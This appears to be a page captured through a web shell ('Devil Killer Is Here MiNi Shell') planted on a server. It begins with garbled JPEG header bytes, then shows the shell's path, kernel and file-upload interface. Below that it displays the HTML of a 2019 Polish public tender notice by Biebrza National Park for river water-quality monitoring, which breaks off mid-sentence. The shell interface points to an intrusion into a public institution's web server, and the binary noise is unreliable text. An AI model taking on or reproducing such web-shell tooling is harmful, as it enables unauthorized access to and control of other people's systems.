JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20190313/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20190313/525017-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 525017-N-2019 z dnia 2019-03-13 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Biebrzański Park Narodowy</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Monitoring jakości wód na obszarze projektu LIFE13 NAT/PL/000050</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu">Zamówienie udzielane w ramach realizacji projektu LIFE13 NAT/PL/000050 ,,Renaturyzacja sieci hydrograficznej w Basenie Środkowym doliny Biebrzy. Etap II",współfinansowanego przez instrument finansowy LIFE+ Komisji Europejskiej, Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej oraz beneficjenta projektu - Biebrzański Park Narodowy. </span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Biebrzański Park Narodowy</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">20066798500000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Osowiec-Twierdza</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">8</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">19-110</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Goniądz</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">podlaskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">857 380 620</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">tomasz.powalko@biebrza.org.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">85 738 30 21</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">https://www.biebrza.org.pl/</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Państwowa osoba prawna</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">https://www.bip.biebrza.org.pl/redir,przetargi</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">https://www.bip.biebrza.org.pl/redir,przetargi</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Oferty nalezy złożyć lub przesłać w opakowaniu nieprzezroczystym, zamkniętym, zapewniajacym nienaruszalność do terminu otwarcia ofert.</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Biebrzański Park Narodowy, Osowiec-Twierdza 8, 19-110 Goniądz</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Monitoring jakości wód na obszarze projektu LIFE13 NAT/PL/000050</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP.26.6.2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">2</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Rozdział A - monitoring elementów biologicznychI.	Przedmiotem zamówienia jest pobieranie prób i wykonanie badań laboratoryjnych wraz z opracowaniem wyników w zakresie elementów biologicznych wód powierzchniowych na obszarze Projektu LIFE13 NAT/PL/000050.1.	Monitoring elementów biologicznych prowadzony będzie w 14 punktach pomiarowo-kontrolnych, znajdujących się na następujących ciekach: rzeka Ełk - 4 punkty, rzeka Jegrznia - 2 punkty, Biebrza - 2 punkty, Kanał Kapicki - 2 punkty, Kanał Woźnawiejski - 1 punkt, Kanał Rudzki - 2 punkty, Kanał Kuwaski - 1 punkt. Przybliżoną lokalizację punktów pomiarowo-kontrolnych przedstawia Załącznik nr 15 do SIWZ.2.	Wykaz punktów pomiarowo-kontrolnych i ich opis zamieszczono w Załączniku nr 16 do SIWZ.3.	Pobór próbek wody i materiału biologicznego do badań w zakresie elementów biologicznych będzie prowadzony z częstotliwością 2 razy w roku przez 3 lata wdrażania projektu tj. w latach 2019 - 2021. 4.	Pobór prób wody i materiału biologicznego do badań w ramach zamówienia należy przeprowadzić zgodnie z harmonogramem stanowiącym Załącznik nr 14 do SIWZ. 5.	W ramach badań elementów biologicznych będą badane następujące wskaźniki: fitoplankton, makrofity, fitobentos, makrobezkręgowce bentosowe. Łącznie monitoring elementów biologicznych obejmie 4 wskaźniki. 6.	Analizy laboratoryjne należy wykonać na podstawie metodyk referencyjnych, zgodne z wymaganiami obowiązujących przepisów prawnych. 7.	W ramach zamówienia Wykonawca zobowiązany jest:a)	Do zapewnienia odpowiednich, sterylnych naczyń do poboru prób wody i materiału biologicznego.b)	Do poboru prób wody i materiału biologicznego we własnym zakresie.c)	Zapewnić pobór prób wody i materiału biologicznego w uzgodnionym z Zamawiającym terminie i lokalizacji. d)	Zapewnić transport prób we własnym zakresie i na własny koszt.e)	Do poboru, transportu i przechowywania prób wody i materiału biologicznego zgodnie z wymaganiami dla poboru i przechowywania prób do badań.8.	Każdorazowo termin poboru prób wody i materiału biologicznego będzie uzgadniany z Zamawiającym w celu wydania zezwolenia upoważniającego do przebywania na obszarze Biebrzańskiego Parku Narodowego. Ponadto Biebrzański Park Narodowy wystąpi do Ministerstwa Środowiska o imienne zezwolenia (dla osób, które będą uczestniczyć w wykonaniu zamówienia) na umyślne niszczenie oraz zrywanie lub uszkadzanie makrofitów i chwytanie makrobezkręgowców bentosowych na obszarze Biebrzańskiego Parku Narodowego.9.	Należy wziąć pod uwagę, że obszar objęty pracami jest terenem bagiennym, podmokłym, o podłożu torfowym, a niektóre punkty pomiarowo-kontrolne są zlokalizowane w miejscach trudno dostępnych, gdzie dojść należy pieszo. W czasie prac, ubiór należy dostosować do warunków pogodowych i terenowych (np. czapka, kalosze/wodery, moskitiera).II.	Forma przekazania wyników i organizacja prac1.	Wykonawca zobowiązany jest do przekazania Zamawiającemu sprawozdań w postaci wyników analiz laboratoryjnych z każdego okresu badań. 2.	Wykonawca zobowiązany jest sporządzić raporty roczne o stanie elementów biologicznych jakości wód za lata 2019-2021 (łącznie 3 szt.) oraz jeden raport końcowy o zmianach wartości biologicznych elementów jakości wód powierzchniowych na obszarze Projektu LIFE13 NAT/PL/000050 w latach 2015-2021. W tym celu Zamawiający przekaże raport końcowy z monitoringu elementów biologicznych, który był prowadzony w latach 2015-2018. Raport ten zostanie przekazany Wykonawcy po wykonaniu prac terenowych w 2021 roku.3.	Raport roczny o stanie elementów biologicznych jakości wód należy złożyć w siedzibie Biebrzańskiego Parku Narodowego w Osowcu-Twierdzy. 4.	Roczny raport powinien zawierać:a)	Protokoły z poboru próbek dla każdego punktu pomiarowo-kontrolnego, z dwóch okresów badań. b)	Wyniki analiz z dwóch okresów badań przeprowadzonych w danym roku dla każdego punktu pomiarowo-kontrolnego.c)	Wartości wskaźników jakości wód wchodzących w skład elementów biologicznych (z dwóch okresów badań) należy porównać z wartościami granicznymi klas jakości wód powierzchniowych, uzyskując klasę dla każdego badanego wskaźnika. d)	Wyniki badań w danym punkcie pomiarowo-kontrolnym w danym roku przeprowadzonego badania będą zamieszczone w przygotowanym formularzu stanowiącym Załącznik nr 17 do SIWZ. Formularz z monitoringu wód dla danego punktu pomiarowo-kontrolnego zawierać będzie wyniki badań wskaźników elementów biologicznych z dwóch okresów badań w roku oraz obliczone średnie stężenie w roku. Ostatnia kolumna formularza (granica stanu dobrego) zawierać będzie wartość graniczną danego wskaźnika jakości wód właściwą dla stanu dobrego wód (II klasa). Wartości graniczne muszą być zgodne z zobowiązującymi w Polsce regulacjami prawnymi.e)	Każdy formularz dla danego punktu pomiarowo-kontrolnego zawiera informację z numerem, nazwą, lokalizacją punktu pomiarowo-kontrolnego oraz informacją o osobie dokonującej poboru i wykonania badań. f)	Każda rzeka powinna zostać zakwalifikowana przez Wykonawcę do danego typu abiotycznego rzek, wg. obowiązującego prawa.g)	Raporty roczne powinny dokumentować prace terenowe oraz prace laboratoryjne w formie opisowej, fotograficznej i graficznej. 5.	Raport końcowy powinien zawierać podsumowanie badań biologicznych prowadzonych w latach 2015-2021 na obszarze Projektu LIFE13 NAT/PL/000050. 6.	Raport końcowy o zmianach wartości biologicznych elementów jakości wód powierzchniowych na obszarze Projektu LIFE13 NAT/PL/000050 w latach 2015-2021, należy złożyć do 7 grudnia 2021 r. do siedziby Biebrzańskiego Parku Narodowego w Osowcu-Twierdzy.7.	Każdy raport roczny oraz końcowy należy dostarczyć w formie wydruku oraz na nośniku elektronicznym zapisanym w formacie edytowalnym ,,doc" oraz w formacie ,,pdf". Na stronie tytułowej raportu Wykonawca umieści logo Projektu, logo BbPN, logo mechanizmu finansowego LIFE+, logo Natura 2000 oraz logo NFOŚiGW - logotypy dostarczone przez Zamawiającego. W stopce raportu winny być umieszczone następujące informacje: Opracowanie powstało w ramach projektu LIFE13 NAT/PL/000050 ,,Renaturyzacja sieci hydrograficznej w Basenie Środkowym doliny Biebrzy. Etap II." współfinansowanego przez instrument finansowy LIFE+ Komisji Europejskiej, Narodowy Fundusz Ochrony Środowiska i Gospodarki Wodnej oraz Biebrzański Park Narodowy.8.	Zgodnie z art. 29 ust. 3a ustawy ZamPublUZamawiający nie wymaga zatrudnienia na podstawie umowy o pracę przez Wykonawcę lub Podwykonawcę osób wykonujących prace fizyczne, które są niezbędne do wykonania przedmiotu zamówienia. Rozdział B - monitoring elementów fizykochemicznychI.	Przedmiotem zamówienia jest pobieranie prób i wykonanie badań laboratoryjnych wraz z opracowaniem wyników w zakresie elementów fizykochemicznych wód powierzchniowych na obszarze Projektu LIFE13 NAT/PL/000050.1.	Monitoring elementów fizykochemicznych prowadzony będzie w 14 punktach pomiarowo-kontrolnych, znajdujących się na następujących ciekach: rzeka Ełk - 4 punkty, rzeka Jegrznia - 2 punkty, Biebrza - 2 punkty, Kanał Kapicki - 2 punkty, Kanał Woźnawiejski - 1 punkt, Kanał Rudzki - 2 punkty, Kanał Kuwaski - 1 punkt. Przybliżoną lokalizację punktów pomiarowo-kontrolnych przedstawia Załącznik nr 15 do SIWZ.2.	Wykaz punktów pomiarowo-kontrolnych i ich opis zamieszczono w Załączniku nr 16 do SIWZ.3.	Pobór próbek wody do badań w zakresie elementów fizykochemicznych będzie prowadzony z częstotliwością 2 razy w roku przez 3 lata wdrażania projektu tj. w latach 2019 - 2021. 4.	Pobór prób wody do badań w ramach zamówienia należy przeprowadzić zgodnie z harmonogramem stanowiącym Załącznik nr 14 do SIWZ. 5.	W ramach badania elementów fizykochemicznych będą badane następujące wskaźniki: temperatura wody, zawiesina ogólna, tlen rozpuszczony, BZT5, ChZT-Mn, ogólny węgiel organiczny, przewodność, substancje rozpuszczone, siarczany, chlorki, wapń, magnez, twardość ogólna, odczyn pH, zasadowość ogólna, azot amonowy, azot Kjeldahla, azot azotanowy, azot ogólny, fosforany, fosfor ogólny. Łącznie monitoring elementów fizykochemicznych obejmie 21 wskaźników.6.	Analizy laboratoryjne należy wykonać na podstawie metodyk referencyjnych, zgodne z wymaganiami obowiązujących przepisów prawnych. 7.	W ramach zamówienia Wykonawca zobowiązany jest:a)	Do zapewnienia odpowiednich, sterylnych naczyń do poboru prób wody.b)	Do poboru prób wody we własnym zakresie.c)	Zapewnić pobór prób wody w uzgodnionym z Zamawiającym terminie i lokalizacji. d)	Zapewnić transport prób we własnym zakresie i na własny koszt.e)	Do poboru, transportu i przechowywania prób wody zgodnie z wymaganiami dla poboru i przechowywania prób do badań.8.	Każdorazowo termin poboru prób wody będzie uzgadniany z Zamawiającym w celu wydania zezwolenia upoważniającego do przebywania na obszarze Biebrzańskiego Parku Narodowego.9.	Należy wziąć pod uwagę, że obszar objęty pracami jest terenem bagiennym, podmokłym, o podłożu torfowym, a niektóre punkty pomiarowo-kontrolne są zlokalizowane w miejscach trudno dostępnych, gdzie dojść należy pieszo. W czasie prac, ubiór należy dostosować do warunków pogodowych i terenowych (np. czapka, kalosze/wodery, moskitiera).II.	Forma przekazania wyników i organizacja prac1.	Wykonawca zobowiązany jest do przekazania Zamawiającemu sprawozdań w postaci wyników analiz laboratoryjnych z każdego okresu badań. 2.	Wykonawca zobowiązany jest sporządzić raporty roczne o stanie elementów fizykochemicznych jakości wód za lata 2019-2021 (łącznie 3 szt.) oraz jeden raport końcowy o zmianach wartości fizykochemicznych elementów jakości wód powierzchniowych na obszarze Projektu LIFE13 NAT/PL/000050 w latach 2015-2021. W tym celu Zamawiający przekaże raport końcowy z monitoringu elementów fizykochemicznych, który był prowadzony w latach 2015-2018. Raport ten zostanie przekazany Wykonawcy po wykonaniu prac terenowych w 2021 roku.3.	Raport roczny o stanie elementów fizykochemicznych jakości wód należy złożyć w siedzibie Biebrzańskiego Parku Narodowego w Osowcu-Twierdzy. 4.	Roczny raport powinien zawierać:a)	Protokoły z poboru próbek dla każdego punktu pomiarowo-kontrolnego, z dwóch okresów badań. b)	Wyniki analiz z dwóch okresów badań przeprowadzonych w danym roku dla każdego punktu pomiarowo-kontrolnego.c)	Wartości wskaźników jakości wód wchodzących w skład elementów fizykochemicznych (z dwóch okresów badań) należy porównać z wartościami granicznymi klas jakości wód powierzchniowych, uzyskując klasę dla każdego badanego wskaźnika. d)	Wyniki badań w danym punkcie pomiarowo-kontrolnym w danym roku przeprowadzonego badania będą zamieszczone w przygotowanym formularzu stanowiącym Załącznik nr 17 do SIWZ. Formularz z monitoringu wód dla danego punktu pomiarowo-kontrolnego zawierać będzie wyniki badań wskaźników elementów fizykochemicznych z dwóch okresów badań w roku oraz obliczone średnie stężenie w roku. Ostatnia kolumna formularza (granica stanu dobrego) zawierać będzie wartość graniczną danego wskaźnika jakości wód właściwą dla stanu dobrego wód (II klasa). Wartości graniczne muszą być zgodne z zobowiązującymi w Polsce regulacjami prawnymi.e)	Każdy formularz dla danego punktu pomiarowo-kontrolnego zawiera informację z numerem, nazwą, lokalizacją punktu pomiarowo-kontrolnego oraz informacją o osobie dokonującej poboru i wykonania badań. f)	Każda rzeka powinna zostać zakwalifikowana przez Wykonawcę do danego typu abiotycznego rzek, wg. obowiązującego prawa.g)	Raporty roczne powinny dokumentować prace terenowe oraz prace laboratoryjne w formie opisowej, fotograficznej i graficznej. 5.	Raport końcowy powinien zawierać podsumowanie badań fizykochemicznych prowadzonych w latach 2015-2021 na obszarze Projektu LIFE13 NAT/PL/000050. 6.	Raport końcowy o zmianach wartości 